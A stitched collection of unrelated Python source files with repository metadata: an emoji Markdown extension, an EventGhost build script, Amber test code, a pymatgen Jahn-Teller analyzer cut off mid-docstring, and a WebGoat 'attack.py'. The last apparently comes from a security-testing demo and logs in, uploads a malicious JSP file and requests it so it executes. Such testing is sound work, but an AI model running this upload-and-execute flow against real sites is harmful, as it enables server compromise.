'👞': ":shoes:".split(),
'👠': ":pumps: :stiletto: :high_heel:".split(),
'💄': ":lipstick:".split(),
'👢': ":shoes: :boot:".split(),
'👕': ":formal:".split(),
'👕': ":casual: :tee:".split(),
'👔': ":shirt: :suitup: :formal: :necktie:".split(),
'👚': ":womans_clothes:".split(),
'👗': ":clothes: :dress:".split(),
'🎽': ":pageant: :running_shirt_with_sash:".split(),
'👖': ":jeans:".split(),
'👘': ":dress: :kimono:".split(),
'👙': ":swimming: :bikini:".split(),
'🎀': ":decoration: :bowtie: :ribbon:".split(),
'🎩': ":magic: :gentleman: :classy: :tophat:".split(),
'👑': ":king: :kod: :leader: :royalty: :lord: :crown:".split(),
'👒': ":lady: :womans_hat:".split(),
'👞': ":mans_shoe:".split(),
'🌂': ":drizzle: :closed_umbrella:".split(),
'💼': ":work: :briefcase:".split(),
'👜': ":accessory: :handbag:".split(),
'👝': ":bag: :pouch:".split(),
'👛': ":pocketbook: :purse:".split(),
'👓': ":eyesight: :nerd: :dork: :geek: :eyeglasses:".split(),
'🎣': ":hobby: :fishing_pole_and_fish:".split(),
'☕': ":cafe: :espresso: :coffee:".split(),
'🍵': ":bowl: :tea:".split(),
'🍶': ":wine: :drunk: :sake:".split(),
'🍼': ":container: :milk: :baby_bottle:".split(),
'🍺': ":relax: :drunk: :pub: :beer:".split(),
'🍻': ":beers:".split(),
'🍸': ":booze: :cocktail:".split(),
'🍹': ":tropical_drink:".split(),
'🍷': ":drunk: :wine_glass:".split(),
'🍴': ":cutlery: :kitchen: :fork_and_knife:".split(),
'🍕': ":pizza:".split(),
'🍔': "meat :fast_food: :beef: :cheeseburger: :mcdonalds: :burger: :king:".split(),
'🍟': ":chips: :fast: :food:".split(),
'🍗': ":drumstick: :turkey: :poultry_leg:".split(),
'🍖': ":good: :drumstick: :meat_on_bone:".split(),
'🍝': ":noodles: :noodle: :spaghetti:".split(),
'🍛': ":indian: :spicy: :curry:".split(),
'🍤': ":seafood: :appetizer: :fried_shrimp:".split(),
'🍱': ":box: :bento:".split(),
'🍣': ":fish: :rice: :sushi:".split(),
'🍥': ":seafood :naruto: :japan: :fish_cake:".split(),
'🍙': ":rice_ball:".split(),
'🍘': ":rice_cracker:".split(),
'🍚': ":china: :asian: :rice:".split(),
'🍜': ":noodles: :noodle: :chipsticks: :ramen:".split(),
'🍲': ":soup: :stew:".split(),
'🍢': ":oden:".split(),
'🍡': ":barbecue: :dango:".split(),
'🍳': ":kitchen: :egg:".split(),
'🍞': ":toast: :bread:".split(),
'🍩': ":donut: :doughnut:".split(),
'🍮': ":custard:".split(),
'🍦': ":icecream:".split(),
'🍨': ":ice_cream:".split(),
'🍧': ":shaved_ice:".split(),
'🎂': ":cake: :celebration: :birthday:".split(),
'🍰': ":cake:".split(),
'🍪': ":oreo: :chocolate: :cookie:".split(),
'🍫': ":chocolate_bar:".split(),
'🍬': ":candy:".split(),
'🍭': ":lollipop:".split(),
'🍯': ":bees: :kitchen: :honey_pot:".split(),
'🍎': ":mac: :apple:".split(),
'🍏': ":green_apple:".split(),
'🍊': ":tangerine:".split(),
'🍋': ":lemon:".split(),
'🍒': ":cherries:".split(),
'🍇': ":wine: :grapes:".split(),
'🍉': ":picnic: :watermelon:".split(),
'🍓': ":strawberry:".split(),
'🍑': ":peach:".split(),
'🍈': ":melon:".split(),
'🍌': ":banana:".split(),
'🍐': ":pear:".split(),
'🍍': ":pineapple:".split(),
'🍠': ":sweet_potato:".split(),
'🍆': ":aubergine: :eggplant:".split(),
'🍅': ":tomato:".split(),
'🌽': ":corn:".split(),
'🏠': ":house:".split(),
'🏡': ":house_with_garden:".split(),
'🏫': ":student: :education: :learn: :teach: :school:".split(),
'🏢': ":unit: :bureau: :office:".split(),
'🏣': ":post_office:".split(),
'🏥': ":surgery: :doctor: :hospital:".split(),
'🏦': ":cash: :enterprise: :bank:".split(),
'🏪': ":groceries: :convenience_store:".split(),
'🏩': ":dating: :love_hotel:".split(),
'🏨': ":whotel: :accomodation: :checkin: :hotel:".split(),
'💒': ":couple: :marriage: :bride: :groom: :church: :wedding:".split(),
'⛪': ":religion: :christ: :church:".split(),
'🏬': ":mall: :department_store:".split(),
'🏤': ":european_post_office:".split(),
'🌇': ":good_morning: :dawn: :city_sunrise:".split(),
'🌆': ":evening: :sky: :buildings: :city_sunset:".split(),
'🏯': ":asia: :japanese_castle:".split(),
'🏰': ":royalty: :history: :european_castle:".split(),
'⛺': ":camping: :camp: :outdoors: :tent:".split(),
'🏭': ":industry: :pollution: :smoke: :factory:".split(),
'🗼': ":asia: :tokyo_tower:".split(),
'🗾': ":nation: :country: :asia: :island: :japan:".split(),
'🗻': ":mountain: :mount_fuji:".split(),
'🌄': ":view: :sunrise_over_mountains:".split(),
'🌅': ":view: :sunrise:".split(),
'🌠': ":night: :falling: :sky: :bright: :stars:".split(),
'🗽': ":newyork: :monument: :head: :statue_of_liberty:".split(),
'🌉': ":sanfrancisco: :bridge_at_night:".split(),
'🎠': ":carnival: :ride: :carousel_horse:".split(),
'🌈': ":unicorn: :sky: :color: :rainbow:".split(),
'🎡': ":carnival: :londoneye: :ferris_wheel:".split(),
'⛲': ":fresh: :fountain:".split(),
'🎢': ":carnival: :playground: :ride: :roller_coaster:".split(),
'🚢': ":titanic: :deploy: :cruise: :ship:".split(),
'🚤': ":speedboat:".split(),
'⛵': ":sailing: :sailboat: :boat:".split(),
'⛵': ":sailboat:".split(),
'🚣': ":hobby: :rowboat:".split(),
'⚓': ":ferry: :boat: :anchor:".split(),
'🚀': ":launch: :staffmode: :NASA: :outer_space: :outer_space: :fly: :rocket:".split(),
'✈': ":flight: :fly: :airplane:".split(),
'🚁': ":fly: :helicopter:".split(),
'🚂': ":train: :steam_locomotive:".split(),
'🚊': ":tram:".split(),
'🚞': ":mountain_railway:".split(),
'🚲': ":bicycle: :exercise: :hipster: :bike:".split(),
'🚡': ":ski: :aerial_tramway:".split(),
'🚟': ":suspension_railway:".split(),
'🚠': ":ski: :mountain_cableway:".split(),
'🚜': ":farming: :agriculture: :tractor:".split(),
'🚙': ":blue_car:".split(),
'🚘': ":oncoming_automobile:".split(),
'🚗': ":car:".split(),
'🚗': ":red_car:".split(),
'🚕': ":uber: :taxi:".split(),
'🚖': ":uber: :oncoming_taxi:".split(),
'🚛': ":express: :articulated_lorry:".split(),
'🚌': ":bus:".split(),
'🚍': ":oncoming_bus:".split(),
'🚨': ":police: :ambulance: :911: :emergency: :alert: :error: :pinged: :rotating_light:".split(),
'🚓': ":police_car:".split(),
'🚔': ":911: :oncoming_police_car:".split(),
'🚒': ":fire_engine:".split(),
'🚑': ":911: :hospital: :ambulance:".split(),
'🚐': ":minibus:".split(),
'🚚': ":truck:".split(),
'🚋': ":carriage: :public: :travel: :train:".split(),
'🚉': ":public: :station:".split(),
':train2:': ":train2:".split(),
'🚅': ":speed: :fast: :public: :travel: :bullettrain_front:".split(),
'🚄': ":bullettrain_side:".split(),
'🚈': ":light_rail:".split(),
'🚝': ":monorail:".split(),
'🚃': ":railway_car:".split(),
'🚎': ":bart: :trolleybus:".split(),
'🎫': ":event: :concert: :pass: :ticket:".split(),
'⛽': ":gasstation: :petroleum: :fuelpump:".split(),
'🚦': ":driving: :vertical_traffic_light:".split(),
'🚥': ":stoplight: :signal: :traffic_light:".split(),
'⚠': ":exclamation: :wip: :alert: :error: :problem: :issue: :warning:".split(),
'🚧': ":wip: :progress: :caution: :warning: :construction:".split(),
'🔰': ":badge: :shield: :beginner:".split(),
'🏧': ":cash: :payment: :bank: :atm:".split(),
'🎰': ":bet: :gamble: :vegas: :machine: :luck: :casino: :slot_machine:".split(),
'🚏': ":wait: :busstop:".split(),
'💈': ":hair: :salon: :style: :barber:".split(),
'♨': ":bath: :warm: :relax: :hotsprings:".split(),
'🏁': ":contest: :finishline: :rase: :gokart: :checkered_flag:".split(),
'🎌': ":nation: :country: :border: :crossed_flags:".split(),
'🏮': ":light: :halloween: :spooky: :izakaya_lantern:".split(),
'🗿': ":easter: :island: :statue: :moyai:".split(),
'🎪': ":carnival: :circus_tent:".split(),
'🎭': ":acting: :theater: :drama: :performing_arts:".split(),
'📍': ":location: :map: :here: :round_pushpin:".split(),
'🚩': ":mark: :milestone: :place: :triangular_flag_on_post:".split(),
'🔣': ":note: :ampersand: :percent: :glyphs: :characters: :symbols:".split(),
'◀': ":left: :arrow_backward:".split(),
'⬇': ":bottom: :arrow_down:".split(),
'▶': ":right: :arrow_forward:".split(),
'⬅': ":previous: :back: :arrow_left:".split(),
'🔠': ":ABCD:".split(),
'🔡': ":abcd:".split(),
'🔤': ":abc:".split(),
'↙': ":arrow_lower_left:".split(),
'↘': ":arrow_lower_right:".split(),
'➡': ":next: :arrow_right:".split(),
'⬆': ":continue: :top: :arrow_up:".split(),
'↖': ":arrow_upper_left:".split(),
'↗': ":arrow_upper_right:".split(),
'⏬': ":arrow_double_down:".split(),
'⏫': ":arrow_double_up:".split(),
'🔽': ":arrow_down_small:".split(),
'⤵': ":arrow_heading_down:".split(),
'⤴': ":arrow_heading_up:".split(),
'↩': ":undo: :leftwards_arrow_with_hook:".split(),
'↪': ":rotade: :arrow_right_hook:".split(),
'↔': ":left_right_arrow:".split(),
'↕': ":way: :arrow_up_down:".split(),
'🔼': ":triangle: :forward: :arrow_up_small:".split(),
'🔃': ":sync: :cycle: :round: :repeat: :arrows_clockwise:".split(),
'🔄': ":arrows_counterclockwise:".split(),
'⏪': ":fast_backward:".split(),
'⏩': ":speed: :continue: :fast_forward:".split(),
'ℹ': ":information_source:".split(),
'🆗': ":OK:".split(),
'🔀': ":shuffle: :random: :twisted_rightwards_arrows:".split(),
'🔁': ":loop: :record: :repeat:".split(),
'🔂': ":repeat_one:".split(),
'🆕': ":start: :new:".split(),
'🔝': ":TOP:".split(),
'🆙': ":above: :high: :UP:".split(),
'🆒': ":COOL:".split(),
'🆓': ":FREE:".split(),
'🆖': ":NG:".split(),
'🎦': ":movie: :record: :film: :cinema:".split(),
'🈁': ":here: :katakana: :destination: :koko:".split(),
'📶': ":reception: :phone: :internet: :connection: :wifi: :bluetooth: :signal_strength:".split(),
'🈂': ":katakana: :sa:".split(),
'🚻': ":toilet: :refresh: :wc: :gender: :restroom:".split(),
'🚹': ":toilet: :restroom: :wc: :gender: :mens:".split(),
'🚺': ":toilet: :loo: :restroom: :gender: :womens:".split(),
'🚼': ":child: :baby_symbol:".split(),
'🚭': ":cigarette: :smell: :smoke: :no_smoking:".split(),
'🅿': ":parking:".split(),
'♿': ":disabled: :a11y: :accessibility: :wheelchair:".split(),
'🚇': ":mrt: :underground: :tube: :metro:".split(),
'🛄': ":airport: :transport: :baggage_claim:".split(),
'🉑': ":good: :kanji: :agree: :yes:".split(),
'🚾': ":toilet: :restroom:".split(),
'🚰': ":liquid: :restroom: :cleaning: :faucet: :potable_water:".split(),
'🚮': ":info: :put_litter_in_its_place:".split(),
'Ⓜ': ":m: :subway:".split(),
'🛂': ":custom:".split(),
'🛅': ":travel: :left_luggage:".split(),
'🛃': ":passport: :border:".split(),
'🉐': ":kanji: :obtain: :get: :circle: :ideograph_advantage:".split(),
'🆘': ":help: :emergency: :911: :sos:".split(),
'🆔': ":id:".split(),
'🚫': ":forbid: :limit: :denied: :disallow: :circle: :no_entry_sign:".split(),
'🔞': ":18: :pub: :night: :minor: :circle: :underage:".split(),
'📵': ":iphone: :mute: :circle: :no_mobile_phones:".split(),
'🚯': ":trash: :bin: :garbage: :circle: :do_not_litter:".split(),
'🚱': ":faucet: :tap: :circle: :non:".split(),
'🚳': ":cyclist: :prohibited: :circle: :no_bicycles:".split(),
'🚷': ":rules: :crossing: :walking: :circle: :no_pedestrians:".split(),
'🚸': ":warning: :danger: :driving:".split(),
'⛔': ":limit: :denied: :circle: :no_entry:".split(),
'❇': ":stars: :fireworks: :sparkle:".split(),
'✴': ":eight_pointed_black_star:".split(),
'💟': ":heart_decoration:".split(),
'📳': ":phone: :vibration_mode:".split(),
'📴': ":mute: :silence: :quiet: :mobile_phone_off:".split(),
'💹': ":yen: :chart:".split(),
'💱': ":travel: :currency_exchange:".split(),
'♈': ":aries:".split(),
'♉': ":taurus:".split(),
'♊': ":gemini:".split(),
'♋': ":cancer:".split(),
'♌': ":leo:".split(),
'♍': ":virgo:".split(),
'♎': ":libra:".split(),
'♏': ":scorpio: :scorpius:".split(),
'♐': ":sagittarius:".split(),
'♑': ":capricorn:".split(),
'♒': ":aquarius:".split(),
'♓': ":pisces:".split(),
'⛎': ":zodiac: :constellation: :astrology: :ophiuchus:".split(),
'🔯': ":religion: :jewish: :hexagram: :six_pointed_star:".split(),
'❎': ":x: :deny: :negative_squared_cross_mark:".split(),
'🅰': ":a:".split(),
'🅱': ":b:".split(),
'🆎': ":ab:".split(),
'💠': ":jewel: :gem: :crystal: :fancy: :diamond_shape_with_a_dot_inside:".split(),
'♻': ":environment: :garbage: :trash: :recycle:".split(),
'🔚': ":end:".split(),
'🔙': ":return: :back:".split(),
'🔛': ":on:".split(),
'🔜': ":soon:".split(),
'💲': ":payment: :currency: :heavy_dollar_sign:".split(),
'©': ":ip: :license: :circle: :copyright:".split(),
'®': ":circle: :registered:".split(),
'™': ":trademark: :brand: :tm:".split(),
'❌': ":no: :delete: :remove: :x:".split(),
'❗': ":shocked: :surprised: :heavy_exclamation_mark:".split(),
'‼': ":exclamation: :surprise: :bangbang:".split(),
'⁉': ":wat: :punctuation: :surprise: :interrobang:".split(),
'⭕': ":circle: :round: :o:".split(),
'✖': ":heavy_multiplication_x:".split(),
'➕': ":addition: :more: :increase: :heavy_plus_sign:".split(),
'➖': ":subtract: :less: :heavy_minus_sign:".split(),
'➗': ":divide: :heavy_division_sign:".split(),
'💮': ":white_flower:".split(),
'✔': ":nike: :heavy_check_mark:".split(),
'☑': ":agree: :confirm: :ballot_box_with_check:".split(),
'🔘': ":input: :old: :circle: :radio_button:".split(),
'🔗': ":rings: :url: :link:".split(),
'➰': ":scribble: :draw: :squiggle: :curly_loop:".split(),
'〰': ":draw: :line: :moustache: :mustache: :squiggle: :scribble: :wavy_dash:".split(),
'〽': ":part_alternation_mark:".split(),
'🔱': ":spear: :trident:".split(),
'▪': ":black_small_square:".split(),
'▫': ":white_small_square:".split(),
'◾': ":black_medium_small_square:".split(),
'◽': ":white_medium_small_square:".split(),
'◼': ":black_medium_square:".split(),
'◻': ":white_medium_square:".split(),
'⬛': ":black_large_square:".split(),
'⬜': ":white_large_square:".split(),
'✅': ":white_check_mark:".split(),
'🔲': ":black_square_button:".split(),
'🔳': ":white_square_button:".split(),
'⚫': ":black_circle:".split(),
'⚪': ":white_circle:".split(),
'🔴': ":red_circle:".split(),
'🔵': ":large_blue_circle:".split(),
'🔷': ":large_blue_diamond:".split(),
'🔶': ":large_orange_diamond:".split(),
'🔹': ":small_blue_diamond:".split(),
'🔸': ":small_orange_diamond:".split(),
'🔺': ":small_red_triangle:".split(),
'🔻': ":small_red_triangle_down:".split(),
}
STYLES = {
'❤': 'color:red',
'💔': 'color:red',
'🍰': 'color:maroon',
'🌰': 'color:maroon',
'🎅': 'color:red',
'🎄': 'color:green',
'☃': 'color:cyan',
}
config = {
'emoji': [
EMOJI,
'A mapping from emoticon symbols to a list of aliases.'
],
'styles': [
STYLES,
'A mapping from emoticon symbol to a CSS style string. '
'Only works if span_class is enabled.'
],
'span_class': [
'emoji',
'A CSS class (default: "emoji") for the emoticons-encompassing'
'<span>. Disabled if None.'
],
}
def __init__ (self, *args, **kwargs):
super(UnimojiExtension, self).__init__(*args, **kwargs)
# Set keys as aliases so they get processed the same
for k, v in self.getConfig('emoji').items(): v.append(k)
# Inverse the emoji mapping
aliases = {}
for emoticon, alias in self.getConfig('emoji').items():
for a in alias:
aliases[a] = emoticon
self.config['aliases'] = [aliases, '']
def extendMarkdown(self, md, md_globals):
import re
RE = r'((?<=\s)|(?<=^))(?P<emoticon>%s)(?=\s|$)' % '|'.join(map(re.escape, self.getConfig('aliases')))
md.inlinePatterns['emoji'] = UnimojiPattern(RE, md, self)
class UnimojiPattern(Pattern):
def __init__ (self, pattern, md, extension):
super(UnimojiPattern, self).__init__(pattern, md)
self.ext = extension
def handleMatch(self, m):
# Get the preferred Unicode emoticon, or override
emoticon = self.ext.getConfig('aliases')[m.group('emoticon')]
# Try to parse it as HTML in case it's overriden
try: element = etree.fromstring(emoticon.encode('utf-8'))
except etree.ParseError:
pass
# Apply class name if needed
span_class = self.ext.getConfig('span_class')
if span_class:
try: element
except NameError:
element = etree.Element('span')
element.text = emoticon
element.set('class', span_class)
# Apply style formatting
style = self.ext.getConfig('styles').get(emoticon)
if style: element.set('style', style)
try:
return element
except NameError:
return emoticon
def makeExtension(*args, **kwargs):
return UnimojiExtension(*args, **kwargs)
if __name__ == '__main__':
import doctest; doctest.testmod()
|
Naereen/cuisine
|
plugins/mdx_unimoji/mdx_unimoji.py
|
Python
|
mit
| 47,452
|
[
"Bowtie",
"CASINO",
"CRYSTAL",
"ESPResSo",
"Octopus"
] |
4cc7ae572137d38c54165eb282487b7d5548594a760d9da395de4dc28d1e7170
|
# -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2016 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
"""
This script creates the EventGhost setup installer.
"""
from os.path import dirname, exists, join
# Local imports
import builder
from builder.Utils import CaseInsensitiveList, ListDir
SKIP_IF_UNCHANGED = CaseInsensitiveList(
r"plugins\Task\TaskHook.dll",
)
class MyBuilder(builder.Builder):
name = "EventGhost"
description = "EventGhost Automation Tool"
companyName = "EventGhost Project"
copyright = u"Copyright © 2005-2016 EventGhost Project"
mainScript = "EventGhost.pyw"
includeModules = [
"CommonMark",
"comtypes",
"Crypto",
"docutils",
"isapi",
"jinja2",
"PIL",
"pkg_resources",
"pythoncom",
"pywin32",
"win32com",
"wx",
]
excludeModules = [
"eg",
"_imagingtk",
"_tkinter",
"cffi", # bundled for no reason
"comtypes.gen",
#"ctypes.macholib", # seems to be for Apple
"curses",
"distutils.command.bdist_packager",
"distutils.mwerkscompiler",
"FixTk",
"FixTk",
"gopherlib",
"idlelib",
"ImageGL",
"ImageQt",
"ImageTk", # py2exe seems to hang if not removed
"ipaddr", # bundled for no reason
"ipaddress", # bundled for no reason
"lib2to3",
"PIL._imagingtk",
"PIL.ImageTk",
"pyasn1", # bundles a broken version if not removed
"pycparser", # bundled for no reason
"pywin",
"simplejson", # bundled for no reason
"tcl",
"test",
"Tix",
"Tkconstants",
"tkinter", # from `future`
"Tkinter",
"turtle", # another Tkinter module
"WalImageFile", # odd syntax error in file
"win32com.axdebug",
"win32com.axscript",
"win32com.demos",
"win32com.gen_py",
"wx.lib.floatcanvas", # needs NumPy
"wx.lib.plot", # needs NumPy
"wx.lib.vtk",
"wx.tools.Editra",
"wx.tools.XRCed",
]
def BuildInstaller(self):
"""
Create and compile the Inno Setup installer script.
"""
from builder.InnoSetup import InnoInstaller
inno = InnoInstaller(self)
for filename, prefix in self.GetSetupFiles():
inno.AddFile(
join(self.sourceDir, filename),
dirname(filename),
ignoreversion=(filename not in SKIP_IF_UNCHANGED),
prefix=prefix
)
if exists(join(self.outputDir, "CHANGELOG.md")):
inno.AddFile(join(self.outputDir, "CHANGELOG.md"))
else:
inno.AddFile(join(self.sourceDir, "CHANGELOG.md"))
inno.AddFile(
join(self.sourceDir, "py%s.exe" % self.pyVersionStr),
destName="py.exe"
)
inno.AddFile(
join(self.sourceDir, "pyw%s.exe" % self.pyVersionStr),
destName="pyw.exe"
)
inno.AddFile(
join(self.tmpDir, "VersionInfo.py"),
destDir="eg\\Classes"
)
inno.ExecuteInnoSetup()
def GetSetupFiles(self):
"""
Return all files needed by the installer.
The code scans for all files in the working copy and adds
them to the list, except if a "noinstall" property is set for the file
or a parent directory of the file.
Plugins with a "noinclude" file are also skipped.
"""
files = set(ListDir(self.sourceDir, [], fullpath=False))
with open(join(self.pyVersionDir, "Root Includes.txt"), "r") as f:
rootIncludes = CaseInsensitiveList(*f.read().strip().split("\n"))
noincludes = [".", "_"]
coreplugins = []
for f in files.copy():
if f.endswith("noinclude"):
noincludes.append(f.replace("noinclude", ""))
elif f.endswith("core-plugin"):
coreplugins.append(f.replace("core-plugin", ""))
files.remove(f)
installFiles = []
for f in files:
if not f.startswith(tuple(noincludes)):
if f.count("\\") == 0 and f not in rootIncludes:
pass
else:
#if f.startswith(tuple(coreplugins)):
installFiles.append([f, "{app}"])
#else:
# # Install to ProgramData\EventGhost\plugins
# installFiles.append([f,
# "{commonappdata}\\%s" % self.appName])
return installFiles
MyBuilder().Start()
|
WoLpH/EventGhost
|
_build/Build.py
|
Python
|
gpl-2.0
| 5,391
|
[
"VTK"
] |
31a15048105129e69d38a292bb52670361c4f10f0a06130fe1e168f748e336a3
|
import requests
import os
class attack:
session = requests.Session()
# the login page
url1 = 'http://127.0.0.1:8080/WebGoat/login.mvc'
# where login credentials are posted to
url2 = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
# login payload
payload = {'username':'guest','password':'guest'}
# takes us to the login page
first = session.get(url1)
# log in
login = session.post(url2, data=payload)
# where our attack is posted
url3 = 'http://127.0.0.1:8080/WebGoat/attack?Screen=18&menu=1600'
# our attack file
files = {'file': open('vuln-26,maliciousfileattack.jsp', 'rb')}
# post the attack file
r = session.post(url3, files=files)
# where the uploaded file should be stored
url4 = 'http://127.0.0.1:8080/WebGoat/uploads/vuln-26,maliciousfileattack.jsp'
# now we need to visit the page in order to fall victim to the attack file
session.get(url4)
# if the attack worked, a guest.txt file will exist at this location
result = os.path.isfile('/opt/owasp/webgoat/.extract/webapps/WebGoat/mfe_target/guest.txt')
# have gauntlt check which of these strings appears
if result:
print 'The site is vulnerable.'
else:
print 'The site is secure.'
|
mtesauro/gauntlt-demo
|
examples/webgoat/vuln-26/attack.py
|
Python
|
mit
| 1,189
|
[
"VisIt"
] |
5671274f77308bcf9a6a3ba6a987feafbc67b1489d9e1b31e3600f6b60226da2
|
import sys
sys.path.append('../../')
import amber_run_tests as ar
def test_get_tests_from_test_name():
assert ar.get_tests_from_test_name('test.serial', 'Makefile.amber') == \
['test.serial.MM', 'test.serial.QMMM',
'test.serial.sander.SEBOMD',
'test.serial.emil', 'test.serial.sanderapi']
assert ar.get_bunch_of_individual_tests('test.serial', 'Makefile.amber') == \
[]
|
Amber-MD/ambertools-conda-build
|
conda_tools/test/test_amber_run_tests/test_amber_run_tests.py
|
Python
|
mit
| 432
|
[
"Amber"
] |
b757fb5f092fdf6eee3b96547116e43cf7d63b85109f3a5c86d8ecd06f52228c
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
JahnTeller distortion analysis.
"""
import os
import warnings
from typing import Any, Dict, Optional, Tuple, Union
import numpy as np
from pymatgen.analysis.bond_valence import BVAnalyzer
from pymatgen.analysis.local_env import (
LocalStructOrderParams,
get_neighbors_of_site_with_index,
)
from pymatgen.core.periodic_table import Species, get_el_sp
from pymatgen.core.structure import Structure
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
MODULE_DIR = os.path.dirname(os.path.abspath(__file__))
class JahnTellerAnalyzer:
"""
Will attempt to classify if structure *may* be Jahn-Teller active.
Class currently uses datafile of hard-coded common Jahn-Teller
active ions.
If structure is annotated with magnetic moments, will estimate
if structure may be high-spin or low-spin.
Class aims for more false-positives than false-negatives.
"""
def __init__(self):
"""
Init for JahnTellerAnalyzer.
"""
self.spin_configs = {
"oct": { # key is number of d electrons
0: {"high": {"e_g": 0, "t_2g": 0}, "default": "high"},
1: {"high": {"e_g": 0, "t_2g": 1}, "default": "high"}, # weak J-T
2: {"high": {"e_g": 0, "t_2g": 2}, "default": "high"}, # weak
3: {"high": {"e_g": 0, "t_2g": 3}, "default": "high"}, # no J-T
4: {
"high": {"e_g": 1, "t_2g": 3},
"low": {"e_g": 0, "t_2g": 4},
"default": "high",
}, # strong high, weak low
5: {
"high": {"e_g": 2, "t_2g": 3},
"low": {"e_g": 0, "t_2g": 5},
"default": "low",
}, # no high, weak low
6: {
"high": {"e_g": 2, "t_2g": 4},
"low": {"e_g": 0, "t_2g": 6},
"default": "high",
}, # weak high, no low
7: {
"high": {"e_g": 2, "t_2g": 5},
"low": {"e_g": 1, "t_2g": 6},
"default": "low",
}, # weak high, strong low
8: {"high": {"e_g": 2, "t_2g": 6}, "default": "high"}, # no
9: {"high": {"e_g": 3, "t_2g": 6}, "default": "high"}, # strong
10: {"high": {"e_g": 4, "t_2g": 6}, "default": "high"},
},
"tet": { # no low spin observed experimentally in tetrahedral, all weak J-T
0: {"high": {"e": 0, "t_2": 0}, "default": "high"},
1: {"high": {"e": 1, "t_2": 0}, "default": "high"},
2: {"high": {"e": 2, "t_2": 0}, "default": "high"},
3: {"high": {"e": 2, "t_2": 1}, "default": "high"},
4: {"high": {"e": 2, "t_2": 2}, "default": "high"},
5: {"high": {"e": 2, "t_2": 3}, "default": "high"},
6: {"high": {"e": 3, "t_2": 3}, "default": "high"},
7: {"high": {"e": 4, "t_2": 3}, "default": "high"},
8: {"high": {"e": 4, "t_2": 4}, "default": "high"},
9: {"high": {"e": 4, "t_2": 5}, "default": "high"},
10: {"high": {"e": 4, "t_2": 6}, "default": "high"},
},
}
def get_analysis_and_structure(
self,
structure: Structure,
calculate_valences: bool = True,
guesstimate_spin: bool = False,
op_threshold: float = 0.1,
) -> Tuple[Dict, Structure]:
"""Obtain an analysis of a given structure and if it may be Jahn-Teller
active or not. This is a heuristic, and may give false positives and
false negatives (false positives are preferred).
Args:
structure: input structure
calculate_valences: whether to attempt to calculate valences or not, structure
should have oxidation states to perform analysis (Default value = True)
guesstimate_spin: whether to guesstimate spin state from magnetic moments
or not, use with caution (Default value = False)
op_threshold: threshold for order parameter above which to consider site
to match an octahedral or tetrahedral motif, since Jahn-Teller structures
can often be
quite distorted, this threshold is smaller than one might expect
Returns:
analysis of structure, with key 'strength' which may be 'none', 'strong',
'weak', or 'unknown' (Default value = 0.1) and decorated structure
"""
structure = structure.get_primitive_structure()
if calculate_valences:
bva = BVAnalyzer()
structure = bva.get_oxi_state_decorated_structure(structure)
# no point testing multiple equivalent sites, doesn't make any difference to analysis
# but makes returned
symmetrized_structure = SpacegroupAnalyzer(structure).get_symmetrized_structure()
# to detect structural motifs of a given site
op = LocalStructOrderParams(["oct", "tet"])
# dict of site index to the Jahn-Teller analysis of that site
jt_sites = []
non_jt_sites = []
for indices in symmetrized_structure.equivalent_indices:
idx = indices[0]
site = symmetrized_structure[idx]
# only interested in sites with oxidation states
if isinstance(site.specie, Species) and site.specie.element.is_transition_metal:
# get motif around site
order_params = op.get_order_parameters(symmetrized_structure, idx)
if order_params[0] > order_params[1] and order_params[0] > op_threshold:
motif = "oct"
motif_order_parameter = order_params[0]
elif order_params[1] > op_threshold:
motif = "tet"
motif_order_parameter = order_params[1]
else:
motif = "unknown"
motif_order_parameter = None
if motif in ["oct", "tet"]:
# guess spin of metal ion
if guesstimate_spin and "magmom" in site.properties:
# estimate if high spin or low spin
magmom = site.properties["magmom"]
spin_state = self._estimate_spin_state(site.specie, motif, magmom)
else:
spin_state = "unknown"
magnitude = self.get_magnitude_of_effect_from_species(site.specie, spin_state, motif)
if magnitude != "none":
ligands = get_neighbors_of_site_with_index(structure, idx, approach="min_dist", delta=0.15)
ligand_bond_lengths = [ligand.distance(structure[idx]) for ligand in ligands]
ligands_species = list({str(ligand.specie) for ligand in ligands})
ligand_bond_length_spread = max(ligand_bond_lengths) - min(ligand_bond_lengths)
def trim(f):
"""
Avoid storing to unreasonable precision, hurts readability.
"""
return float("{:.4f}".format(f))
# to be Jahn-Teller active, all ligands have to be the same
if len(ligands_species) == 1:
jt_sites.append(
{
"strength": magnitude,
"motif": motif,
"motif_order_parameter": trim(motif_order_parameter),
"spin_state": spin_state,
"species": str(site.specie),
"ligand": ligands_species[0],
"ligand_bond_lengths": [trim(length) for length in ligand_bond_lengths],
"ligand_bond_length_spread": trim(ligand_bond_length_spread),
"site_indices": indices,
}
)
# store reasons for not being J-T active
else:
non_jt_sites.append(
{
"site_indices": indices,
"strength": "none",
"reason": "Not Jahn-Teller active for this " "electronic configuration.",
}
)
else:
non_jt_sites.append(
{
"site_indices": indices,
"strength": "none",
"reason": "motif is {}".format(motif),
}
)
# perform aggregation of all sites
if jt_sites:
analysis = {"active": True} # type: Dict[str, Any]
# if any site could exhibit 'strong' Jahn-Teller effect
# then mark whole structure as strong
strong_magnitudes = [site["strength"] == "strong" for site in jt_sites]
if any(strong_magnitudes):
analysis["strength"] = "strong"
else:
analysis["strength"] = "weak"
analysis["sites"] = jt_sites
return analysis, structure
return {"active": False, "sites": non_jt_sites}, structure
def get_analysis(
self,
structure: Structure,
calculate_valences: bool = True,
guesstimate_spin: bool = False,
op_threshold: float = 0.1,
) -> Dict:
"""
Convenience method, uses get_analysis_and_structure method.
Obtain an analysis of a given structure and if it may be Jahn-Teller
active or not. This is a heuristic, and may give false positives and
false negatives (false positives are preferred).
Args:
structure: input structure
calculate_valences: whether to attempt to calculate valences or not, structure
should have oxidation states to perform analysis (Default value = True)
guesstimate_spin: whether to guesstimate spin state from magnetic moments
or not, use with caution (Default value = False)
op_threshold: threshold for order parameter above which to consider site
